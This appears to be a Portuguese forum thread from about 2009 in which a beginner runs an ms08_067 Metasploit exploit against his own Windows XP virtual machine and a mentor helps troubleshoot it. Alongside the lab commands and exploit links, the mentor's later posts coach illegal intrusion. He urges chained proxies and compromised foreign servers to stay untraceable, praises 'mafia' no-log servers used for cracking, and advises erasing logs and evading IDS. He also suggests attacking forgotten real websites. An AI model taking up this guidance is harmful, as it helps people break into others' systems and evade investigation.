• Revista PROGRAMAR: Já está disponível a edição #53 da revista programar. Faz já o download aqui!

bonucci

Para pessoal dos Metasploit Dúvida...

24 mensagens neste tópico

Oi pessoal, estou aqui numa encrenca, se alguem souber como resolver esse problema, eu ando a usar o backtrack e ando a testar na minha máquina virtual.

Instalei o windows xp SP2 e  um server, e ate desactivei a firewall e n instalei nenhuns patches para fazer o teste.

Pus enable as portas qeu queria atacar, por exemplon o "smb"...

Comecei por um scan

Starting Nmap 5.00 ( http://nmap.org ) at 2009-12-01 03:40 Hora Padrão de Greenwich

Interesting ports on 192.168.1.11:

Not shown: 991 closed ports

PORT    STATE SERVICE

21/tcp  open  ftp

25/tcp  open  smtp

80/tcp  open  http

135/tcp  open  msrpc

139/tcp  open  netbios-ssn

443/tcp  open  https

445/tcp  open  microsoft-ds

1025/tcp open  NFS-or-IIS

1433/tcp open  ms-sql-s

MAC Address: 00:0C:29:E1:9C:F7 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 16.68 seconds

e depois lancei o exploit,

msf > use windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set TARGET 3

TARGET => 3

msf exploit(ms08_067_netapi) > set RHOST 192.168.1.11

RHOST => 192.168.1.11

msf exploit(ms08_067_netapi) > set RPORT 445

RPORT => 445

             

msf exploit(ms08_067_netapi) > set PAYLOAD generic/shell_bind_tcp

PAYLOAD => generic/shell_bind_tcp

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler

[*] Triggering the vulnerability...

[*] Exploit completed, but no session was created.

msf exploit(ms08_067_netapi) >

Tentei vários exploits com variados payloads, mas infelizmente n consegui abrir nenhuma sessão.

Será que há pro aí alguem do forum que tenha usado o metasploit e saiba o que poderá estar correndo mal nessa minha experiencia...

Não sei se ajuda para tirar uma conclusão com esta tela que apareceu depois de lançado o exploit qeu apareceu na maquina vitual do windows xp

http://www.maurobonucci.com/tcm16973/resultado_netapi.jpg

Fiquem bem pessoal

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

pois o que te aconteceu é normal neste mundo... bem vindo ao mundo da HARD STUFF

o que aconteceu é que o teu processo alvo está a rebentar... acontece muito... um exploit é algo poderoso e muito intrusivo, violento, para os processos e muitas, muitas vezes mesmo provocam o "crash" do mesmo, que é o que te aconteceu pela imagem que mostras...

não consigo ver tudo com o que mostraste... escolheste bem o TARGET? é que há exploits que dependem de versões especificas, como se é um XP em ingles e coisas do genero...

tentas-te varias vezes? deu sempre o mesmo? aconteceu o mesmo com todos os exploits?

uma das coisas que custumo fazer é analisar bem a vulnerabilidade para ver as versões das dll´s alvo (pode algum programa até ter actualizado a dll netapi.dll) e ver as versões do SO vulneraveis

detalhes da vulnerabilidade aqui com versões de DLL´s e SO´s

http://support.microsoft.com/kb/958644

outra coisa comum neste caso que estás a aprender, pois no real deve-se evitar ao máximo o "contacto". dizia, experimenta um exploit fora da framework. no milw0rm tens versões mt boas e completas, com tudo incluído... as diversas coisas e ferramentas que tinhas de usar dantes :P

segue estes passos (os que precisares ou vai directamente ao milw0rm e saca o exploit... acho que há videos lá a mostrar passo a passo a exploitation dessa vuln visto ser a mais usada para aprender

usam este em pyton que está excelente mesmo

http://www.milw0rm.com/exploits/download/7132.py

vê detalhes aqui

http://forum.intern0t.net/offensive-guides-information/759-playing-ms08-067-a.html

tiveste shell? ganhaste root? assim despistas se há algo de errado na forma como usas o metasploit

poque não usas o interface web? é mais facil usar meterpreter, que é uma framework dentro da framework para se usar na maquina algo com montes de goodys... eu sou um homem da linha de comandos.. é sem duvida para a maioria dos casos a mais rapida e melhor forma de gerir uma box... mas no metasploit abro (como a maioria) uma execpção... e usa-se mt o interface web devido a teres "melhor" integrado diversas coisas importantes e mais info sobre o que fazer e o que estás  a fazer...

videos sobre usar o interface web com o metrepreter e montes de cenas cools

estes primeiros em duas partes são muito bons... e os outros tb

parte 1    http://www.ethicalhacker.net/content/view/137/24/

parte 2    http://www.ethicalhacker.net/content/view/136/24/

http://www.milw0rm.com/video/watch.php?id=41

http://www.irongeek.com/i.php?page=videos/metasploit1

videos metaploit no youtube (o milworm tb é para mim uma boa fonte "publica porque mt se passa underground" de se conhecer e arranjar meios neste meio :=

http://www.youtube.com/results?search_type=videos&search_query=metasploit&search_sort=video_date_uploaded

e parabens por estares a entrar nesta grande familia do metasploit... o metasploit é o sonho (para mim melhor que ganhar o euromilhões), pois integra numa framework tudo o que antes tínhamos de andar manualmente a fazer e processos mt demorosos e chatos

se unires a isso os produtos de criação de exploits novos e adaptação de existentes para o formato metasploit... o mundo será teu (pelo menos a maioria dos servidores que como já deves ter visto com o nmap não estão minimamente protegidos, quer por firewalls, quer por actualizações... o que me faz rir quando vejo certos moderadores de certos fóruns terem atitudes menos correctas... tirando o cracking pa guita a maioria é motivada por pessoal "chateado" com algo... uma empresa que lhe deu um mau serviço, alguém que o tratou mal...enfim

e com o metasploit a força está contigo  :)

explora isso e domina... pode ser que um dia ainda pertenças a um dojo  :P

teckV

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Obrigado herakty pelas dicas, sem duvida que voume dedicar o metasploit, o Backtrack em geral, mas o Metasploit sem duvida, infelizmente aqui em portugal n existe um forum nacional especializado nessa área ou até numa área simplesmente para Sistemas de segurança e testes de penetração de segurança, n vejo até nada por aí de cursos especializados somente em pentesting, muito pouco mesmo, e cada vez andam a precisar pelo mundo profissionais especializados nessa área especifica de pentesting.

Mas voltando atás, obrigado as dicas, e sem duvida vou trabalhar para poder tornar num samurai do Metasploit lol

  :)

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Será que os exploits difere entre pro exemplo o windows xp professional SP2 e o Wp home edition SP2??

Qual o sistema operativo que usas para testes?

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
Será que os exploits difere entre pro exemplo o windows xp professional SP2 e o Wp home edition SP2??

Qual o sistema operativo que usas para testes?

alguns sim, outros não... analisa na info do exploit... há vários sites dedicados a fornecer essa info como o securityfocus

vê no link que te dei

testaste o outro em python para ver se há algum prob com o teu metasploit? é que esse é bem basico e funca com, acho  que todas as versões do XP

para alguns a lingua conta, para outros não... é analisar... aqui não há papinha feita...e é investigação constante

teckV

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Já tentei mas n dá esse script :S

Deve ser problema do metasploit, n sei, vou experimentar depois, agora tou sem o me portatil, foi a vida a motherboard :S

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

para o scrip .py tens de usar o python que é uma das melhores linguagens....

http://www.python.org/

instala isso e corre "c:\python ficheiro.py"

ou usa a consola

e testa outros exploits (há mts para o XP SP2) e segue passo a passo tutoriais de exploits que vejas nos tutoriais a funcionar

insiste... persistência é a principal característica deste mundo

teckV

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Sem duvida que vou persistir nisso, isso é concerteza,eu agora vou começara guiar pelo tutorial metasploit unleashed que lançaram, mas já agora, n sei se faz diferença, mas se for isso, mas o windows xp sp2 por exemplo, faz diferença entre ser o windows xp sp2 homem edition ou o windows xp sp2 professional?

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
Sem duvida que vou persistir nisso, isso é concerteza,eu agora vou começara guiar pelo tutorial metasploit unleashed que lançaram, mas já agora, n sei se faz diferença, mas se for isso, mas o windows xp sp2 por exemplo, faz diferença entre ser o windows xp sp2 homem edition ou o windows xp sp2 professional?

como te disse pode ou não fazer... no securityfocus ou em outros locais oficiais sobre a info das vulnerabilidades isso é descrito... entre home e profissional quase sempre há diferença e por vezes até na lingua

mas se usares o comando "show options" do exploit verás tb logo no metasploit... ou nos targets a escolher

estuda a documentação do metasploit e procura por info na net

MAS OLHA... CUIDADO COM ISTO... TENS DE TER CONHECIMENTOS DE REDES, SISTEMAS E DE EQUIPAMENTOS PARA PERCEBERES BÊM O QUE FAZES

tipo... não apontes um exploit a um servidor só porque sabes usar e o servidor está vulneravel, pois é normal pelo meio haver logs e equipamentos como IPS e IDS que te vão apanhar

estudo tudo isto mt bem e MT ATENÇÃO... vamos falando

procura um topico meu sobre proxys... é mt IMPORTANTE O USO DE PROXYS

teckV

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

S, vou procurar isso. Sem duvida que o uso de proxys possa ser importante, mas infelizmente nunca é possivel uma pessoa se esconder mesmo estando por tras dos proxys...

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Isso é Relativo..... Depende do proxy, da ligação, do ISP, de muita coisa

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
S, vou procurar isso. Sem duvida que o uso de proxys possa ser importante, mas infelizmente nunca é possivel uma pessoa se esconder mesmo estando por trás dos proxys...

essa afirmação deixou-me um bocado.... então como é que é possível o cracking? se não fosse possivel esconder a identidade todos os casos eram descobertos em minutos e processados...

e é desconhecer completamente o funcionamento da internet a nivel de serviços e protocolos

vê este tópicos meus onde explico o conceito de proxy e vou ao nivel do pacote

Invisibilidade na Internet - PROXyS

http://www.portugal-a-programar.pt/index.php?showtopic=2014

e este para saberes procurar devidamente proxys e não usares redes para dummys como o TOR (super lento e não oferece pura segurança)

Procurar e Usar Proxys

http://www.portugal-a-programar.pt/index.php?showtopic=4169

sabes o que é trabalhares numa equipe de segurança de um banco e identificares ataques e quando vais formular prova vês que apenas consegues identificar servidores socks 5 perdidos no hyperespaço, em locais fisicos remotos e em paises sem qualquer acordo judicial para se poder investifar? nem o proxy consegues investigar e estes proxys estão configurados para apagar os rastos

é claro, que as técnicas de "apagar rastos" tb são essenciais mas é para elevar cada vez mais o nivel... nunca facilitar, mas os proxys são um meio mt seguro

o proxy no cracking começou de forma simples... é que dantes para acederes à net tinhas de aceder a uma univ... não havia ISP´s e só as univs estavam ligadas... um dado curioso... a partir dai começou a ideia de explorar mais isto e usar técnicas de "evasão" e "invisibilidade"

senão acreditas no proxy não vale a pena fazeres nada.. já agora conheces o TOR? já fizestes testes com o TOR? é a forma mais simples de veres um serviço proxy em acção

entende o que eu disse como quiseres...

Isso é Relativo..... Depende do proxy, da ligação, do ISP, de muita coisa

tudo é relativo... é preciso entender bem este conceito e técnica... já vi mts lixarem-se por pensarem estar escondidos por um proxy... mas como não dominavam completamente a arte... não viram tudo bem e... mas com uso avançado é uma técnica hyper eficaz

alias, a base de tudo... sem isso teríamos de andar em locais publicos, war driving... mas com isto pode-se estar em casa e...

teckV

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Wardriving dá trabalho! Gasta-se combustivel... a não ser que arranjes umas antenas direccionais e estejas nas imediações de uma rede publica.

Existem alternativas aos proxys.... Algumas tão antiguinhas e tão eficazes.... mas também tão complexas....

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
Existem alternativas aos proxys.... Algumas tão antiguinhas e tão eficazes.... mas também tão complexas...

quando tens algo que funciona na perfeição porque mudar?

teckV

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Nem mais.....

Ainda assim às vezes recorrer a tecnicas mais antigas é mais "eficaz". Dependendo do que se está a tentar fazer.... Sempre ouvi dizer que em segurança se tem de esperar o inesperado, o que nos pareça absurdo, e o que seja obvio.

Pela experiencia que tenho, já vi usarem tecnicas tão antigas mas que funcionam tão bem.... Ainda que não me tenha surpreendido a tecnica, fiquei surpreso por vê-la ser utilizada.... Sabes que ninguém espera o inesperado! Gosto da ideia de se ter algo que funcione, e não se andar a "inventar"... Ainda que apagar rastos em proxies dê algum trabalho, e se tiveres a falar em proxys encadeados, mais trabalho dá. Tem que se mexer com muita coisa, em muito pouco tempo....

Cumprimentos

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Também era uma ideia, mas e "aceder-lhes"....

Normalmente uma VPN (boa) tem hardware bastante bom, a controla-la, provavelmente tem alguma PIX no caminho, utiliza certificados de autenticidade, se não usar algum gerador de passwords, e faz logs de tudo e mais alguma coisa. Comprometer uma PIX não é como ganhar acesso de admin num Windows XP.

E as poucas que conheço com open-vpn estão bem seguras, alem do mais maior parte das VPN's que conheço deixaram de usar PPTP para usar IPSEC, o que torna as coisas um "bocadinho", mais trabalhosas.... Não penso que VPN's sejam para uso comum, mas sim para uso mais "avançado".

Cumprimentos

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
E porque não VPNs?

no caso que falo dos proxys é para se ser "invisivel".... acho que disse tudo sobre isso

teckV

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Proxies são uma das formas de "invisibilidade", mas se estivermos a falar de uma coisa mais séria que tal ligação VPN a um dos proxy, e depois encadeamento de proxies sucessivos..., ou VPN's.... É sempre uma ideia, resbuscada mas uma ideia....

Cada um escolhe a sua tecnica de eleição para permanecer invisivel, que diga-se de passagem são tantas que lhes perco a conta....

Cumprimentos

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

no caso que falo dos proxys é para se ser "invisivel".... acho que disse tudo sobre isso

teckV

Também falei de VPNs para "invisibilidade".

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
Também falei de VPNs para "invisibilidade".

apesar de não ser  preciso pois o metodo proxy é do best... vou questionar a solução VPN

mas com autenticação e tudo mais... estás a falar em tomar de assalto um servidor no sudão e instalar lá uma VPN remotamente, criar autenticação e chaves de encriptação... é isso? com todo o log que isso faz e o facto de usarmos servidores que não são nossos... sei que os logs se apagam, mas enquanto tens a sessão aberta... sabes não é?

ou não percebi bêm a tua solução... podes explicar melhor sff?

é que estamos a falar de um solução que torne impossível seguirem os teus rastos e identificarem a tua rampa de lançamento, que hoje em dia, a primeira é mesmo em casa :=)

servidores localizados em países sem acordos judiciais e de preferência estejam num caos a nível de policia... para não haver qualquer hipóteses de investigação e detecção

haverá algo que me está a escapar na tua solução? e qual é o problema com os proxys? com socks 5 podes usar o SSH que é o que o ppl faz... pois isso normalmente já existe no servidor vitima e apenas "abusas" do que já lá está e passas por um user normal... isto é muito mais complexo e há muitas "situações"... para mim o melhor é usar os servidores da máfia que estão "configurados" mesmo para o cracking... com um sistema de "no log" e apagamento dos logs de sistema e já com certas tools interessantes e tal... mas há muita coisa neste mundo dos proxys e há várias necessidades e níveis de "invisibilidade" que podem ou não ser necessários..

teckV

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

herakty, fds, já era sem tempo, andei ás cabeçadas com o metasploits e finalmente começa a colher frutos B) looool

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

esplora tambem o vector aplicarional HTTP porta 80... pois por vezes é a unica porta de entrada e ja há shells XSS para fazer a ponte para outros servidores internos... ou o SQL Injection para manipular dados

explora esses conceitos... e sempre, sempre mt atenção... domina a ciência do proxy... ou...

Application Vulnerability Scanner

http://www.portugal-a-programar.pt/index.php?showtopic=31539

isto é como o metasploit mas vocacionado para a web... HTTP... analisa aplicações expostas para fora e abertas na firewall

estuda também os mecanismos de defesa para saberes com o que vais lidar... hoje nos alvos a sério usa-se IDS e IPS... Intrusion Detecion Systems e Intrusion Prevention Systems

eu tenho montado um cenário com maquinas virtuais onde tenho o Snort no meio, entre a rampa de lançamento e o alvo, para ver que "barulho" fica no IDS (snort)... para alterar as técnicas de forma a que não sejam identificadas por esses sistemas

aprende sobre os sistemas de log e como apagar rastos... mas sem apagar o log todo né :P

não é só usar o metasploit...é preciso entender o TCP/IP a fundo e sistemas operativos como o windows server e o linux... pois o metasploit coloca-te lá dentro... e depois? contrariamente ao que alguém disse o metasploit em si não faz nada... só te dá acesso... é preciso mais...

o metasploit é mesmo excelente e é muito mais que "lançar exploits"... têm o metepreter que é uma framework e linguagem de programação para se "fazer coisas" depois de se ter o acesso... explora isso bem

aprende linguagens que sejam multiplataforma para fazeres tools do momento... à medida de cada situação... C++ é o ideal pois todos os sistemas correm programas C++ sem precisares adicionar nada... mas eu prefiro o Python... python para administrar é do melhor... tá mt vocacionado para networking e é multi plataforma... e está instalado em mts servidores... assim como o java

força... muita motivação... vai brincando com maquinas virtuais... cria maquinas virtuais com os vários SO´s e explora... explora... e analisa os resultados nos logs e IDS

é o mundo nas tuas mãos quando dominares estas técnicas que falei... será com muito tempo mas vais aos poucos... há sites perdidos e esquecidos que são bons para brincar... encontraras neles já coisas de ataques anteriores... explora

e com o rumo da humanidade cada vez mais são precisos hactivistas...

parabéns pelos primeiros sucessos e segue em frente... estarei ao dispor para esclarecer duvidas

teckV

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Crie uma conta ou ligue-se para comentar

Só membros podem comentar

Criar nova conta

Registe para ter uma conta na nossa comunidade. É fácil!


Registar nova conta

Entra

Já tem conta? Inicie sessão aqui.


Entrar Agora